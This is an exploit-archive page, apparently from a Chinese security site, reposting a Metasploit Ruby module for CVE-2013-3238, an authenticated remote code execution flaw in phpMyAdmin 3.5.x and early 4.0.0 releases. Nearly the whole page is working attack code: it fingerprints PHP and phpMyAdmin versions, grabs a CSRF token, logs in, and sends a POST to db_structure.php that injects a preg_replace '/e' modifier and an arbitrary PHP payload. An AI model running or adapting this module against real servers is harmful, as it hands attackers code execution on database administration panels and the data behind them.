首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
phpMyAdmin Authenticated Remote Code Execution via preg_replace()
来源:metasploit.com 作者:Campbell 发布时间:2013-05-02  

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'phpMyAdmin Authenticated Remote Code Execution via preg_replace()',
      'Description' => %q{
          This module exploits a PREG_REPLACE_EVAL vulnerability in phpMyAdmin's
          replace_prefix_tbl within libraries/mult_submits.inc.php via db_settings.php
          This affects versions 3.5.x < 3.5.8.1 and 4.0.0 < 4.0.0-rc3.
          PHP versions > 5.4.6 are not vulnerable.
      },
      'Author' =>
        [
          'Janek "waraxe" Vind', # Discovery
          'Ben Campbell <eat_meatballs[at]hotmail.co.uk>' # Metasploit Module
        ],
      'License' => MSF_LICENSE,
      'References' =>
        [
          [ 'CVE', '2013-3238' ],
          [ 'PMASA', '2013-2'],
          [ 'waraxe', '2013-SA#103' ],
          [ 'EDB', '25003'],
          [ 'OSVDB', '92793'],
          [ 'URL', 'http://www.waraxe.us/advisory-103.html' ],
          [ 'URL', 'http://www.phpmyadmin.net/home_page/security/PMASA-2013-2.php' ]
        ],
      'Privileged' => false,
      'Platform'   => ['php'],
      'Arch'       => ARCH_PHP,
      'Payload'    =>
        {
          'BadChars' => "&\n=+%",
          # Clear out PMA's error handler so it doesn't lose its mind
          # and cause ENOMEM errors and segfaults in the destructor.
          'Prepend' => "function foo($a,$b,$c,$d,$e){return true;};set_error_handler(foo);"
        },
      'Targets' =>
        [
          [ 'Automatic', { } ],
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Apr 25 2013'))

    register_options(
      [
        OptString.new('TARGETURI', [ true, "Base phpMyAdmin directory path", '/phpmyadmin/']),
        OptString.new('USERNAME', [ true, "Username to authenticate with", 'root']),
        OptString.new('PASSWORD', [ false, "Password to authenticate with", ''])
      ], self.class)
  end

  def check
    begin
      res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, '/js/messages.php') })
    rescue
      print_error("Unable to connect to server.")
      return CheckCode::Unknown
    end

    if res.code != 200
      print_error("Unable to query /js/messages.php")
      return CheckCode::Unknown
    end

    php_version = res['X-Powered-By']
    if php_version
      print_status("PHP Version: #{php_version}")
      if php_version =~ /PHP\/(\d)\.(\d)\.(\d)/
        if $1.to_i > 5
          return CheckCode::Safe
        else
          if $1.to_i == 5 and $2.to_i > 4
            return CheckCode::Safe
          else
            if $1.to_i == 5 and $2.to_i == 4 and $3.to_i > 6
              return CheckCode::Safe
            end
          end
        end
      end
    else
      print_status("Unknown PHP Version")
    end

    if res.body =~ /pmaversion = '(.*)';/
      print_status("phpMyAdmin version: #{$1}")
      case $1.downcase
        when '3.5.8.1', '4.0.0-rc3'
          return CheckCode::Safe
        when '4.0.0-alpha1', '4.0.0-alpha2', '4.0.0-beta1', '4.0.0-beta2', '4.0.0-beta3', '4.0.0-rc1', '4.0.0-rc2'
          return CheckCode::Vulnerable
        else
          if $1.starts_with? '3.5.'
            return CheckCode::Vulnerable
          end

          return CheckCode::Unknown
      end
    end
  end

  def exploit
    uri = target_uri.path
    print_status("Grabbing CSRF token...")
    response = send_request_cgi({ 'uri' => uri})
    if response.nil?
      fail_with(Exploit::Failure::NotFound, "Failed to retrieve webpage.")
    end

    if (response.body !~ /"token"\s*value="([^"]*)"/)
      fail_with(Exploit::Failure::NotFound, "Couldn't find token. Is URI set correctly?")
    else
      print_good("Retrieved token")
    end

    token = $1
    post = {
      'token' => token,
      'pma_username' => datastore['USERNAME'],
      'pma_password' => datastore['PASSWORD']
    }

    print_status("Authenticating...")

    login = send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(uri, 'index.php'),
      'vars_post' => post
    })

    if login.nil?
      fail_with(Exploit::Failure::NotFound, "Failed to retrieve webpage.")
    end

    token = login.headers['Location'].scan(/token=(.*)[&|$]/).flatten.first

    cookies = login.get_cookies

    login_check = send_request_cgi({
      'uri' => normalize_uri(uri, 'index.php'),
      'vars_get' => { 'token' => token },
      'cookie' => cookies
    })

    if login_check.body =~ /Welcome to/
      fail_with(Exploit::Failure::NoAccess, "Authentication failed.")
    else
      print_good("Authentication successful")
    end

    db = rand_text_alpha(3+rand(3))
    exploit_result = send_request_cgi({
      'uri'  => normalize_uri(uri, 'db_structure.php'),
      'method' => 'POST',
      'cookie' => cookies,
      'vars_post' => {
        'query_type' => 'replace_prefix_tbl',
        'db' => db,
        'selected[0]' => db,
        'token' => token,
        'from_prefix' => "/e\0",
        'to_prefix' => payload.encoded,
        'mult_btn' => 'Yes'
      }
    },1)
  end
end


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Syslog Watcher Pro 2.8.0.812 -
·Wordpress W3 Total Cache PHP C
·sudo v1.8.0-1.8.3p1 (sudo_debu
·Vivotek IP Camera Buffer Overf
·AudioCover 0.8.18 Buffer Overf
·Easy Icon Maker Version 5.01 C
·Personal File Share HTTP Serve
·DVD X Player 5.5.37 Pro / Stan
·SAP ConfigServlet Remote Code
·ABBS Audio Media Player v3.1 (
·Memcached Remote Denial Of Ser
·FuzeZip 1.0.0.131625 Buffer Ov
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved